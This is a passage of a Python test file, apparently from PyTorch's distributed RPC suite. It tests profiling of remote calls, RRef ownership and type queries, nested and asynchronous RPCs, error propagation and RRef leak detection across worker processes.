with _profile() as prof:
ret = rpc.rpc_async(
dst1, slow_async_add, args=(dst2, x, y, device), timeout=20
)
out = ret.wait()
function_events = prof.function_events
# slow_async_add resulted in an RPC from dst1 -> dst2, so this should be
# recorded.
key_prefix = _build_rpc_profiling_key(
RPCExecMode.ASYNC, slow_async_add.__qualname__, worker_name(self.rank), dst1
)
nested_rpc_key_prefix = _build_rpc_profiling_key(
RPCExecMode.ASYNC, slow_add.__qualname__, dst1, dst2
)
expected_key = key_prefix + REMOTE_OP_STR + nested_rpc_key_prefix
remote_events = [event for event in function_events if event.is_remote]
rpc_remote_event = [
event for event in remote_events if event.name == expected_key
]
self.assertEqual(1, len(rpc_remote_event))
rpc_remote_event = rpc_remote_event[0]
self.assertEqual(rpc_remote_event.node_id, (self.rank + 1) % self.world_size)
# slow_async_add's RPC does an add on dst2, which should be reflected as well.
remote_add_key = (
expected_key + REMOTE_OP_STR + torch.jit._builtins._find_builtin(torch.add)
)
remote_add_event = [
event for event in remote_events if event.name == remote_add_key
]
self.assertEqual(1, len(remote_add_event))
remote_add_event = remote_add_event[0]
# Validate that node_id is dst2.
self.assertEqual(remote_add_event.node_id, (self.rank + 2) % self.world_size)
@dist_init
def test_rpc_profiling_async_function(self):
initialize_pg(self.file_init_method, self.rank, self.world_size)
self._run_rpc_profiling_async_function()
if torch.cuda.is_available():
dist.barrier()
self._run_rpc_profiling_async_function(device="cuda:0")
@dist_init
def test_rpc_profiling_async_function_single_threaded(self):
initialize_pg(self.file_init_method, self.rank, self.world_size)
self._run_rpc_profiling_async_function()
if torch.cuda.is_available():
dist.barrier()
self._run_rpc_profiling_async_function(device="cuda:0")
@dist_init
def test_rpc_profiling_remote_record_function(self):
# test that functions run over RPC with record_function show the expected
# profiled block.
if self.rank != 1:
return
dst_ranks = [i for i in range(self.world_size) if i != self.rank]
for dst_rank in dst_ranks:
dst_worker = worker_name(dst_rank)
with _profile() as prof:
fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=(-1, True))
fut.wait()
function_events = prof.function_events
record_function_remote_event = [
evt for evt in function_events if "##forward##" in evt.name
]
self.assertEqual(1, len(record_function_remote_event))
record_function_remote_event = record_function_remote_event[0]
self.assertEqual(record_function_remote_event.node_id, dst_rank)
# cpu_children only returns direct children, so here we get all
# children recursively.
def get_cpu_children(event):
if not event.cpu_children:
return []
cpu_children = event.cpu_children
for e in event.cpu_children:
cpu_children.extend(get_cpu_children(e))
return cpu_children
remote_children = get_cpu_children(record_function_remote_event)
# Get local children and verify parity.
with _profile() as prof:
udf_with_torch_ops(-1, True)
local_function_events = prof.function_events
local_record_function_event = [
evt for evt in local_function_events if "##forward##" in evt.name
][0]
local_children = get_cpu_children(local_record_function_event)
local_children_names = [
evt.name for evt in local_children
]
REMOTE_OP_STR = "#remote_op: "
def convert_remote_to_local(event_name):
remote_op_key = REMOTE_OP_STR
return event_name[
event_name.find(remote_op_key) + len(remote_op_key) :
]
for evt in remote_children:
local_name = convert_remote_to_local(evt.name)
self.assertTrue(local_name in local_children_names)
def validate_profiling_workload(self, dst, prof):
def convert_remote_to_local(event_name):
return event_name[event_name.find(REMOTE_OP_STR) + len(REMOTE_OP_STR) :]
events = prof.function_events
remote_events = {
convert_remote_to_local(event.name): event
for event in events
if event.is_remote
}
self.assertTrue("aten::mul" in remote_events)
remote_mul_event = remote_events["aten::mul"]
self.assertEqual(remote_mul_event.node_id, dst)
self.check_profiling_info(
worker_name(self.rank),
worker_name(dst),
torch.mul,
remote_mul_event,
RPCExecMode.ASYNC,
)
def _run_test_profiler_with_autograd_context(self):
dst = (self.rank + 1) % self.world_size
if self.rank == 1:
# Cases where we can double wrap messages with profiling information and autograd info.
with dist_autograd.context() as context_id:
with _profile() as prof:
self.run_profiling_workload(dst)
self.validate_profiling_workload(dst, prof)
# Ensure that flipped order of ctx managers results in events being
# recorded as expected.
with _profile() as prof:
with dist_autograd.context() as context_id:
self.run_profiling_workload(dst)
self.validate_profiling_workload(dst, prof)
@dist_init
def test_profiler_with_autograd_context_single_threaded(self):
self._run_test_profiler_with_autograd_context()
@dist_init
def test_profiler_with_autograd_context(self):
self._run_test_profiler_with_autograd_context()
def _profiler_test_with_rpc(self, rpc_exec_mode, func, args, use_record_function=False, dst=None):
dst = dst if dst is not None else (self.rank + 1) % self.world_size
# only run profiler on rank 1.
if self.rank == 1:
with _profile() as prof:
record_function_ctx_mgr = (
contextlib.suppress()
if not use_record_function
else torch.autograd.profiler.record_function(
"foo"
)
)
with record_function_ctx_mgr as rf:
if rpc_exec_mode == RPCExecMode.SYNC:
rpc.rpc_sync(worker_name(dst), func, args=args)
elif rpc_exec_mode == RPCExecMode.ASYNC:
fut = rpc.rpc_async(worker_name(dst), func, args=args)
fut.wait()
else:
self.assertTrue(rpc_exec_mode == RPCExecMode.REMOTE)
rref = rpc.remote(worker_name(dst), func, args=args)
rref.to_here()
# To avoid flakiness, wait for the RRef to be profiled. This
# means that we received the acknowledgement of successful
# creation on the owner and ran the callbacks responsible
# for recording the profiling event.
rref._get_profiling_future().wait()
events = prof.function_events
rpc_event = get_function_event(events, rpc_exec_mode.value)
# verify Node ID for this rpc event.
self.assertEqual(rpc_event.node_id, self.rank)
# Ensure recording of remote events.
remote_events = {event for event in events if event.node_id == dst} - {rpc_event}
self.assertGreaterEqual(len(remote_events), 1)
for remote_event in remote_events:
self.assertEqual(remote_event.node_id, dst)
if use_record_function:
scope_event = get_function_event(events, "foo")
# Since RPC call is within the scope, its CPU interval should be
# contained within foo's interval.
self.assertLessEqual(scope_event.time_range.start, rpc_event.time_range.start)
self.assertGreaterEqual(scope_event.time_range.end, rpc_event.time_range.end)
# the sender, dest worker, function run, and type of RPC should all
# be recorded.
self_worker_name = worker_name(self.rank)
dst_worker_name = worker_name(dst)
self.check_profiling_info(self_worker_name, dst_worker_name, func, rpc_event, rpc_exec_mode)
if use_record_function:
# verify order by ensuring that the outer context comes
# before the rpc event.
foo_event_ix = next(i for i, event in enumerate(events) if "foo" in event.name)
rpc_event_idx = next(i for i, event in enumerate(events) if rpc_exec_mode.value in event.name)
self.assertLess(foo_event_ix, rpc_event_idx)
def _run_test_profiler_with_sync_rpc_udf(self):
self._profiler_test_with_rpc(RPCExecMode.SYNC, my_sleep_func, args=(1,))
self._profiler_test_with_rpc(RPCExecMode.SYNC, my_sleep_func, args=(1,),
use_record_function=True)
@dist_init
def test_profiler_with_sync_rpc_udf(self):
self._run_test_profiler_with_sync_rpc_udf()
@dist_init
def test_profiler_with_sync_rpc_udf_single_threaded(self):
self._run_test_profiler_with_sync_rpc_udf()
def _run_test_profiler_with_sync_rpc_builtin(self):
self._profiler_test_with_rpc(
RPCExecMode.SYNC, torch.mul, args=(torch.ones(1), torch.ones(1))
)
self._profiler_test_with_rpc(
RPCExecMode.SYNC, torch.mul, args=(torch.ones(1), torch.ones(1)),
use_record_function=True
)
@dist_init
def test_profiler_with_sync_rpc_builtin(self):
self._run_test_profiler_with_sync_rpc_builtin()
@dist_init
def test_profiler_with_sync_rpc_builtin_single_threaded(self):
self._run_test_profiler_with_sync_rpc_builtin()
def _run_test_profiler_with_async_rpc_udf(self):
self._profiler_test_with_rpc(RPCExecMode.ASYNC, my_sleep_func, args=(1,))
self._profiler_test_with_rpc(RPCExecMode.ASYNC, my_sleep_func, args=(1,),
use_record_function=True)
@dist_init
def test_profiler_with_async_rpc_udf(self):
self._run_test_profiler_with_async_rpc_udf()
@dist_init
def test_profiler_with_async_rpc_udf_single_threaded(self):
self._run_test_profiler_with_async_rpc_udf()
def _run_test_profiler_with_async_rpc_builtin(self):
self._profiler_test_with_rpc(
RPCExecMode.ASYNC, torch.mul, args=(torch.ones(1), torch.ones(1))
)
self._profiler_test_with_rpc(
RPCExecMode.ASYNC, torch.mul, args=(torch.ones(1), torch.ones(1)),
use_record_function=True
)
@dist_init
def test_profiler_with_async_rpc_builtin(self):
self._run_test_profiler_with_async_rpc_builtin()
@dist_init
def test_profiler_with_async_rpc_builtin_single_threaded(self):
self._run_test_profiler_with_async_rpc_builtin()
def _run_test_profiler_with_remote_udf(self):
self._profiler_test_with_rpc(RPCExecMode.REMOTE, my_sleep_func, args=(1,))
self._profiler_test_with_rpc(
RPCExecMode.REMOTE, my_sleep_func, args=(1,), use_record_function=True
)
# test remote to self
self._profiler_test_with_rpc(
RPCExecMode.REMOTE, my_sleep_func, args=(1,), dst=self.rank
)
@dist_init
def test_profiler_with_remote_udf(self):
self._run_test_profiler_with_remote_udf()
@dist_init
def test_profiler_with_remote_udf_single_threaded(self):
self._run_test_profiler_with_remote_udf()
def _run_test_profiler_with_remote_builtin(self):
self._profiler_test_with_rpc(
RPCExecMode.REMOTE, torch.mul, args=(torch.ones(1), torch.ones(1))
)
self._profiler_test_with_rpc(
RPCExecMode.REMOTE, torch.mul, args=(torch.ones(1), torch.ones(1)),
use_record_function=True
)
# test remote to self
self._profiler_test_with_rpc(
RPCExecMode.REMOTE,
torch.mul,
args=(torch.ones(1), torch.ones(1)),
dst=self.rank,
)
@dist_init
def test_profiler_with_remote_builtin(self):
self._run_test_profiler_with_remote_builtin()
@dist_init
def test_profiler_with_remote_builtin_single_threaded(self):
self._run_test_profiler_with_remote_builtin()
def _run_test_profiler_with_script_async_rpc(self):
self._profiler_test_with_rpc(
RPCExecMode.ASYNC, my_script_func, args=(torch.tensor(1),)
)
self._profiler_test_with_rpc(
RPCExecMode.ASYNC,
my_script_func,
args=(torch.tensor(1),),
use_record_function=True,
)
@dist_init
def test_profiler_with_script_async_rpc(self):
self._run_test_profiler_with_script_async_rpc()
@dist_init
def test_profiler_with_script_async_rpc_single_threaded(self):
self._run_test_profiler_with_script_async_rpc()
def _run_test_profiler_with_script_sync_rpc(self):
self._profiler_test_with_rpc(
RPCExecMode.SYNC, my_script_func, args=(torch.tensor(1),)
)
self._profiler_test_with_rpc(
RPCExecMode.SYNC,
my_script_func,
args=(torch.tensor(1),),
use_record_function=True,
)
@dist_init
def test_profiler_with_script_sync_rpc(self):
self._run_test_profiler_with_script_sync_rpc()
@dist_init
def test_profiler_with_script_sync_rpc_single_threaded(self):
self._run_test_profiler_with_script_sync_rpc()
def _run_test_profiler_with_script_remote_rpc(self):
self._profiler_test_with_rpc(
RPCExecMode.REMOTE, my_script_func, args=(torch.tensor(1),)
)
self._profiler_test_with_rpc(
RPCExecMode.REMOTE,
my_script_func,
args=(torch.tensor(1),),
use_record_function=True,
)
# test remote to self
self._profiler_test_with_rpc(
RPCExecMode.REMOTE, my_script_func, args=(torch.tensor(1),), dst=self.rank
)
@dist_init
def test_profiler_with_script_remote_rpc(self):
self._run_test_profiler_with_script_remote_rpc()
@dist_init
def test_profiler_with_script_remote_rpc_single_threaded(self):
self._run_test_profiler_with_script_remote_rpc()
def _assert_top_level_events(self, process_global_events, expected_top_level_event_names):
top_level_event_names = []
for thread_local_events in process_global_events:
# Get top-level events from all events happened on a thread.
last_end_time = 0
for event in thread_local_events:
event_name = event.name
time_range = event.time_range
if time_range.start > last_end_time:
top_level_event_names.append(event_name)
last_end_time = time_range.end
top_level_event_names = sorted(top_level_event_names)
expected_top_level_event_names = sorted(expected_top_level_event_names)
self.assertEqual(
top_level_event_names,
expected_top_level_event_names,
f"Expected events {expected_top_level_event_names}, but got {top_level_event_names}",
)
@dist_init
def test_server_process_global_profiler(self):
if self.rank != 0:
return
dst_rank = (self.rank + 1) % self.world_size
dst_worker_name = worker_name(dst_rank)
x = torch.tensor(1)
y = torch.tensor(2)
outer_profile_rref = rpc.remote(dst_worker_name, rpc._server_process_global_profile)
outer_profile_rref.rpc_sync().__enter__()
rpc.rpc_sync(dst_worker_name, torch.add, (x, y))
inner_profile_rref = rpc.remote(dst_worker_name, rpc._server_process_global_profile)
inner_profile_rref.rpc_sync().__enter__()
rpc.rpc_sync(dst_worker_name, torch.sub, (x, y))
inner_profile_rref.rpc_sync().__exit__(None, None, None)
outer_profile_rref.rpc_sync().__exit__(None, None, None)
inner_events = rpc.rpc_sync(dst_worker_name, get_events_from_profile, (inner_profile_rref,))
expected_inner_events = ['aten::sub']
expected_outer_events = expected_inner_events + ['aten::add']
self._assert_top_level_events(inner_events, expected_inner_events)
outer_events = rpc.rpc_sync(dst_worker_name, get_events_from_profile, (outer_profile_rref,))
self._assert_top_level_events(outer_events, expected_outer_events)
inner_profile_rref.rpc_sync().key_averages()
outer_profile_rref.rpc_sync().key_averages()
@dist_init
def test_async_record_function_double_end_callbacks(self):
num_sleep_seconds = 1
if self.rank == 1:
# Validate that calling the function twice results in an error.
with _profile() as pf:
with torch.autograd.profiler.record_function("foo") as rf:
fut = rpc.rpc_async(
worker_name(0), my_sleep_func, args=(num_sleep_seconds,)
)
rf._call_end_callbacks_on_future(fut)
with self.assertRaisesRegex(
RuntimeError, "can only be called once."
):
rf._call_end_callbacks_on_future(fut)
fut.wait()
@dist_init
def test_async_record_function_cbs_jit_call(self):
if self.rank == 1:
with _profile() as pf:
key = _build_rpc_profiling_key(
RPCExecMode.ASYNC,
torch._jit_internal._qualified_name(my_script_func),
"worker1",
"worker0",
)
with torch.autograd.profiler.record_function(key) as rf:
fut = rpc.rpc_async(
worker_name(0), my_script_func, args=(torch.tensor(1),)
)
# Intentionally calling record_function internals
fut = torch.ops.profiler._call_end_callbacks_on_jit_fut(rf.handle, fut)
result = fut.wait()
# Validate that the profiling future returns the same value as the RPC
# future.
expected = torch.add(torch.tensor(1), torch.tensor(1))
self.assertEqual(result, expected)
events = pf.function_events
rpc_event = get_function_event(
events, torch._jit_internal._qualified_name(my_script_func)
)
self.assertTrue(torch._jit_internal._qualified_name(my_script_func) in rpc_event.name)
@dist_init
def test_py_class_constructor(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(worker_name(dst_rank), MyClass, args=(n,))
self.assertEqual(ret.a, n)
@dist_init
def test_py_class_instance_method(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank), MyClass(2).my_instance_method, args=(n,)
)
self.assertEqual(ret, MyClass(2).my_instance_method(n))
@dist_init
def test_py_class_method(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank), MyClass.my_class_method, args=(n, n + 1)
)
self.assertEqual(ret, MyClass.my_class_method(n, n + 1))
@dist_init
def test_py_class_static_method(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank), MyClass.my_static_method, args=(n + 10,)
)
self.assertEqual(ret, MyClass.my_static_method(n + 10))
@dist_init
def test_py_multi_async_call(self):
n = self.rank + 1
dst_rank = n % self.world_size
dst_worker_info = rpc.get_worker_info(worker_name(dst_rank))
fut1 = rpc.rpc_async(dst_worker_info, MyClass.my_static_method, args=(n + 10,))
fut2 = rpc.rpc_async(dst_worker_info, min, args=(n, n + 1, n + 2))
self.assertEqual(fut1.wait(), MyClass.my_static_method(n + 10))
self.assertEqual(fut2.wait(), min(n, n + 1, n + 2))
@dist_init
def test_py_no_return_result(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(worker_name(dst_rank), no_result)
self.assertEqual(ret, no_result())
@dist_init
def test_py_tensors(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank),
my_tensor_function,
args=(torch.ones(n, n), torch.ones(n, n)),
)
self.assertEqual(ret, my_tensor_function(torch.ones(n, n), torch.ones(n, n)))
@dist_init
def test_py_tensors_multi_async_call(self):
futs = []
n = self.rank + 1
dst_rank = n % self.world_size
for i in range(100):
fut = rpc.rpc_async(
worker_name(dst_rank),
my_tensor_function,
args=(torch.ones(i, i), torch.ones(i, i)),
)
futs.append(fut)
j = 0
for val in torch.futures.wait_all(futs):
self.assertEqual(
val, my_tensor_function(torch.ones(j, j), torch.ones(j, j))
)
j += 1
@dist_init
def test_py_tensors_in_container(self):
n = self.rank + 1
dst_rank = n % self.world_size
a = [torch.ones(n, n), torch.ones(n, n)]
b = TensorClass(build_complex_tensors())
c = {"foo": torch.ones(n, n), "bar": torch.ones(n, n)}
ret = rpc.rpc_sync(
worker_name(dst_rank), my_complex_tensor_function, args=(a, b, c)
)
self.assertEqual(ret, my_complex_tensor_function(a, b, c))
@dist_init
def test_py_nested_pickle(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank),
run_nested_pickle,
args=(MyPickleClass(), torch.ones(2, 2)),
)
m = MyPickleClass()
m.set(my_tensor_function(torch.ones(2, 2), torch.ones(2, 2)))
self.assertEqual(ret, run_nested_pickle(m, torch.ones(2, 2)))
@dist_init
def test_py_function_exception(self):
n = self.rank + 1
dst_rank = n % self.world_size
with self.assertRaises(TypeError):
ret = rpc.rpc_sync(worker_name(dst_rank), no_result, args=(10,))
@dist_init
def test_py_raise_in_user_func(self):
with captured_output() as (_, err):
# This barrier prevents a race condition where the main thread has
# not entered the context manager when the remote function runs.
initialize_pg(self.file_init_method, self.rank, self.world_size)
dist.barrier()
n = self.rank + 1
dst_rank = n % self.world_size
fut = rpc.rpc_async(worker_name(dst_rank), raise_func)
with self.assertRaisesRegex(ValueError, expected_err):
fut.wait()
# This barrier prevents a race condition where the main thread exits
# context manager before the remote function has ran.
dist.barrier()
# Validate that trainers log errors when running functions.
stderr_lines = err.getvalue()
self.assertTrue(expected_err in stderr_lines)
@dist_init
def test_py_raise_in_user_func_escaped_str(self):
n = self.rank + 1
dst_rank = n % self.world_size
fut = rpc.rpc_async(worker_name(dst_rank), raise_func_escape)
try:
fut.wait()
except ValueError as e:
msg = str(e)
# Ensure newlines are unescaped to provide a better repr of error.
self.assertEqual(msg, msg.encode("utf-8").decode("unicode_escape"))
else:
self.assertTrue(False, "expected raise_func_escape to raise ValueError.")
@dist_init
def test_nested_rpc(self):
self._nested_rpc(nested_rpc, torch.ones(2, 2) + 1)
@dist_init
def test_stress_light_rpc(self):
self._stress_test_rpc(light_rpc)
@dist_init
def test_stress_heavy_rpc(self):
self._stress_test_rpc(heavy_rpc, repeat=20, args=(torch.ones(100, 100),))
@dist_init
def test_stress_heavy_rpc_torchscript(self):
self._stress_test_rpc(heavy_rpc_torchscript, repeat=20, args=(torch.ones(100, 100),))
@dist_init
def test_builtin_remote_ret(self):
self._builtin_remote_ret(
torch.ones(2, 2),
torch.ones(2, 2),
torch.ones(2, 2) * 2
)
@dist_init
def test_builtin_remote_self(self):
self._builtin_remote_self(
torch.ones(2, 2),
torch.ones(2, 2),
torch.ones(2, 2) * 2
)
@staticmethod
def _multi_args_fn(n, sparse=False):
if sparse:
return (build_sparse_tensor(), build_sparse_tensor())
else:
return (torch.ones(n, n), torch.ones(n, n))
@dist_init
def test_multi_builtin_remote_ret(self):
self._test_multi_remote_call(
torch.add, False,
args_fn=RpcTest._multi_args_fn
)
@dist_init
def test_py_udf_remote(self):
n = self.rank + 1
dst_rank = n % self.world_size
rref = rpc.remote(
worker_name(dst_rank),
my_function,
kwargs={"a": n, "b": n + 1, "c": n + 2},
)
self.assertEqual(rref.to_here(), my_function(n, n + 1, n + 2))
@staticmethod
def _multi_kwargs_fn(n, sparse=False):
if sparse:
return {
"a": build_sparse_tensor(),
"b": build_sparse_tensor(),
"c": build_sparse_tensor()
}
else:
return {"a": torch.ones(n, n), "b": torch.ones(n, n), "c": torch.ones(n, n)}
@dist_init
def test_multi_py_udf_remote(self):
self._test_multi_remote_call(
my_function,
False,
kwargs_fn=RpcTest._multi_kwargs_fn
)
@dist_init
def test_py_rref_args(self):
self._py_rref_args(
torch.ones(2, 2),
1,
torch.ones(2, 2),
2,
torch.ones(2, 2) * 2 + 3)
@dist_init
def test_py_rref_args_user_share(self):
self._py_rref_args_user_share(
torch.ones(2, 2),
1,
2,
torch.ones(2, 2),
3,
4,
torch.ones(2, 2) * 2 + 10
)
@dist_init
def test_py_rpc_rref_args(self):
self._py_rpc_rref_args(
torch.ones(2, 2),
1,
2,
torch.ones(2, 2),
3,
4,
torch.ones(2, 2) * 2 + 10
)
@dist_init
def test_nested_remote(self):
self._nested_remote(
nested_remote,
torch.ones(2, 2) + 3
)
@dist_init
def test_nested_rref(self):
self._nested_rref(
nested_rref,
torch.ones(2, 2) + 1,
torch.ones(2, 2) + 2
)
@dist_init
def test_nested_rref_stress(self):
self._nested_rref_stress(
nested_rref,
torch.ones(2, 2) + 1,
torch.ones(2, 2) + 2
)
@dist_init
def test_multi_layer_nested_async_rpc(self):
# This test will exit right away, but there will be a chain of async
# RPCs. The termination algorithm should detect those messages properly.
# Otherwise, some peer could exit early, leaving others to timeout
# errors or connection closed errors.
ttl = 20
n = self.rank + 1
dst_rank = n % self.world_size
multi_layer_nested_async_rpc(dst_rank, self.world_size, ttl)
@dist_init
def test_remote_with_exception(self):
n = self.rank + 1
dst_rank = n % self.world_size
# check ref to other workers
rref = rpc.remote(worker_name(dst_rank), raise_func)
with self.assertRaises(ValueError):
rref.to_here()
# check ref to itself
rref = rpc.remote(worker_name(self.rank), no_result, args=(10,))
with self.assertRaises(TypeError):
rref.to_here()
@dist_init
def test_rpc_return_rref(self):
n = self.rank + 1
dst_rank1 = n % self.world_size
dst_rank2 = (n + 1) % self.world_size
rref = rpc.rpc_sync(
worker_name(dst_rank1),
rpc_return_rref,
args=(worker_name(dst_rank2),),
)
self.assertEqual(rref.to_here(), torch.ones(2, 2) + 1)
@dist_init
def test_rref_forward_chain(self):
ttl = 8
n = self.rank + 1
dst_rank = n % self.world_size
rref = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(n, n), 1)
)
ret_rref = rref_forward_chain(dst_rank, self.world_size, rref, ttl)
for i in range(ttl):
self.assertEqual(len(ret_rref), 1)
ret_rref = ret_rref[0].to_here()
ret = ret_rref
self.assertEqual(ret, torch.add(torch.ones(n, n), 1))
@dist_init
def test_local_rref_no_fork(self):
local_rref = RRef(35)
self.assertEqual(local_rref.local_value(), 35)
@dist_init
def test_local_value_not_on_owner(self):
# ensure that an error message is thrown if a user tries to call
# local_value() on a non-owning node.
next_rank = (self.rank + 1) % self.world_size
rref = rpc.remote(
worker_name(next_rank), torch.add, args=(torch.ones(1), torch.ones(1))
)
with self.assertRaisesRegex(
RuntimeError, (
fr"For UserRRef\(rref_id=GloballyUniqueId\(created_on={self.rank}, local_id=0\), "
fr"fork_id=GloballyUniqueId\(created_on={self.rank}, local_id=1\)\), "
r"can't call localValue\(\) on user "
fr"WorkerInfo\(id={self.rank}, name={worker_name(self.rank)}\). "
fr"Call it on owner WorkerInfo\(id={next_rank}, name={worker_name(next_rank)}\)"
)
):
rref.local_value()
@dist_init
def test_return_local_rrefs(self):
n = self.rank + 1
dst_rank = n % self.world_size
rref_list = rpc.rpc_sync(
worker_name(dst_rank), get_rref_list, args=([1, 2, 3],)
)
for rref in rref_list:
rpc.rpc_sync(
rref.owner(),
_call_method_on_rref,
args=(MyClass.increment_value, rref, 10),
)
rets = [
rpc.rpc_sync(
rref.owner(), _call_method_on_rref, args=(MyClass.get_value, rref)
)
for rref in rref_list
]
self.assertEqual(rets, [11, 12, 13])
@dist_init
def _test_rref_type(self, blocking):
def launched_rpc(events):
expected_name = f"rpc_{RPCExecMode.ASYNC.value}#_rref_typeof_on_owner"
return any([e.name.startswith(expected_name) for e in events])
dst = worker_name((self.rank + 1) % self.world_size)
rref = rpc.remote(dst, torch.add, args=(torch.ones(2), 1))
with _profile() as p:
t = rref._get_type(blocking=blocking)
if not blocking:
t = t.wait()
self.assertTrue(launched_rpc(p.function_events))
expected_type = type(torch.ones(2))
self.assertEqual(t, expected_type)
futs = []
def verify(fut):
self.assertEqual(fut.value(), expected_type)
with _profile() as p:
for _ in range(10):
t = rref._get_type(blocking=blocking)
if not blocking:
futs.append(t)
t.add_done_callback(verify)
t = t.wait()
self.assertEqual(t, expected_type)
if not blocking:
# Note that cached calls with blocking=False all return the same
# cached original future.
first_fut = futs[0]
for f in futs[1:]:
self.assertTrue(f is first_fut)
# Ensure we never launch another RPC, other than for the very
# first call.
self.assertFalse(launched_rpc(p.function_events))
self.assertEqual(t, type(torch.ones(2)))
rref = rpc.remote(dst, MyClass, args=(0,))
rref_type = rref._get_type(blocking=blocking)
if not blocking:
rref_type = rref_type.wait()
self.assertEqual(rref_type, MyClass)
def test_rref_type_blocking(self):
self._test_rref_type(blocking=True)
def test_rref_type_non_blocking(self):
self._test_rref_type(blocking=False)
@dist_init
def _test_rref_type_with_error(self, blocking):
dst = worker_name((self.rank + 1) % self.world_size)
# 10 ms timeout
rref = rpc.remote(dst, raise_func)
# Blocking: error raised inline
if blocking:
with self.assertRaisesRegex(ValueError, "Expected error"):
rref._get_type(blocking=blocking)
else:
# Non-blocking: Immediately return future, block on wait
fut = rref._get_type(blocking=blocking)
with self.assertRaisesRegex(ValueError, "Expected error"):
fut.wait()
def test_rref_type_with_error_blocking(self):
self._test_rref_type_with_error(blocking=True)
def test_rref_type_with_error_non_blocking(self):
self._test_rref_type_with_error(blocking=False)
@dist_init
def _test_rref_type_owner(self, blocking):
rref = RRef(torch.ones(2) + 1)
rref_type = rref._get_type(blocking=blocking)
if not blocking:
rref_type = rref_type.wait()
self.assertEqual(rref_type, type(torch.ones(2)))
rref = RRef(MyClass(0))
rref_type = rref._get_type(blocking=blocking)
if not blocking:
rref_type = rref_type.wait()
self.assertEqual(rref_type, MyClass)
def test_rref_type_owner_blocking(self):
self._test_rref_type_owner(blocking=True)
def test_rref_type_owner_non_blocking(self):
self._test_rref_type_owner(blocking=False)
@staticmethod
def _slow_add(x, y):
time.sleep(1)
return x + y
@dist_init
def test_rref_type_slow_init(self):
dst = worker_name((self.rank + 1) % self.world_size)
rref = rpc.remote(dst, RpcTest._slow_add, args=(torch.ones(2), 1))
self.assertEqual(rref._get_type(), type(torch.ones(2)))
@dist_init
def test_owner_equality(self):
a = RRef(40)
b = RRef(50)
other_rank = (self.rank + 1) % self.world_size
other_a = rpc.remote(
worker_name(other_rank), torch.add, args=(torch.ones(1), 1)
)
other_b = rpc.remote(
worker_name(other_rank), torch.add, args=(torch.ones(1), 1)
)
other_a.to_here() # to ensure clean termination
other_b.to_here()
self.assertNotEqual(a.owner(), 23)
self.assertEqual(other_a.owner(), other_b.owner())
self.assertNotEqual(a.owner(), other_a.owner())
self.assertEqual(other_a.owner(), other_a.owner())
self.assertEqual(other_a.owner(), other_b.owner())
self.assertEqual(a.owner(), a.owner())
self.assertEqual(a.owner(), b.owner())
self.assertEqual(a.owner(), rpc.get_worker_info())
x = dict()
x[a.owner()] = a
x[other_a.owner()] = other_a
self.assertEqual(x[a.owner()], a)
self.assertEqual(x[b.owner()], a)
self.assertEqual(x[other_a.owner()], other_a)
self.assertEqual(x[other_b.owner()], other_a)
self.assertEqual(len(x), 2)
@dist_init
def test_pass_local_rrefs(self):
n = self.rank + 1
dst_rank = n % self.world_size
dst_worker = worker_name(dst_rank)
rref = RRef(40)
self.assertEqual(
rpc.rpc_sync(dst_worker, add_rref_to_value, args=(rref, 50)), 90
)
self.assertEqual(
rpc.rpc_async(dst_worker, add_rref_to_value, args=(rref, 50)).wait(), 90
)
self.assertEqual(
rpc.remote(dst_worker, add_rref_to_value, args=(rref, 50)).to_here(), 90
)
@dist_init
def test_remote_same_worker(self):
n = self.rank + 1
dst_rank = n % self.world_size
rref_a = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(n, n), 2)
)
rref_b = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(n, n), 1)
)
rref_c = rpc.remote(
worker_name(dst_rank), my_rref_function, args=(rref_a, rref_b)
)
self.assertEqual(rref_c.to_here(), torch.ones(n, n) + 4)
@dist_init(setup_rpc=True)
def test_call_method_on_rref(self):
"""
Tests that it is possible to call an instance method on a remote objet
by using rref.owner() as destination of the call.
"""
vals = [10, 2, 5, 7]
dst_rank = (self.rank + 1) % self.world_size
dst_worker = worker_name(dst_rank)
# creates a remote object
rref = rpc.remote(dst_worker, MyClass, args=(vals[0],))
# modifies state of the remote object
rpc.rpc_sync(
rref.owner(),
_call_method_on_rref,
args=(MyClass.increment_value, rref, vals[1]),
)
rpc.rpc_async(
rref.owner(),
_call_method_on_rref,
args=(MyClass.increment_value, rref, vals[2]),
).wait()
rpc.remote(
rref.owner(),
_call_method_on_rref,
args=(MyClass.increment_value, rref, vals[3]),
).to_here()
# queries state of the remote object
result = rpc.rpc_sync(
dst_worker, _call_method_on_rref, args=(MyClass.get_value, rref)
)
self.assertEqual(result, sum(vals))
# Notice `rpc.api.shutdown()` accesses
# `_delete_all_user_and_unforked_owner_rrefs` through
# `torch.distributed.rpc.api`, so patching
# `torch.distributed.rpc._delete_all_user_and_unforked_owner_rrefs` will
# not help.
@mock.patch.object(torch.distributed.rpc.api, "_delete_all_user_and_unforked_owner_rrefs")
def _test_rref_leak(self, _mock_delete_all_user_and_unforked_owner_rrefs, ignore_leak):
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
initialize_pg(self.file_init_method, self.rank, self.world_size)
# Wait for all init to complete.
dist.barrier()
rref = rpc.remote(
worker_name((self.rank + 1) % self.world_size),
torch.add,
args=(torch.ones(2, 2), 1),
)
import torch.distributed.rpc.api as api
if ignore_leak:
api._ignore_rref_leak = True
rpc.shutdown(graceful=True)
else:
api._ignore_rref_leak = False
with self.assertRaisesRegex(RuntimeError, "Leaking RRef"):
rpc.shutdown(graceful=True)
@dist_init(setup_rpc=False)
def test_rref_leak(self):
self._test_rref_leak(ignore_leak=False)
@dist_init(setup_rpc=False)
def test_ignore_rref_leak(self):
self._test_rref_leak(ignore_leak=True)
@dist_init
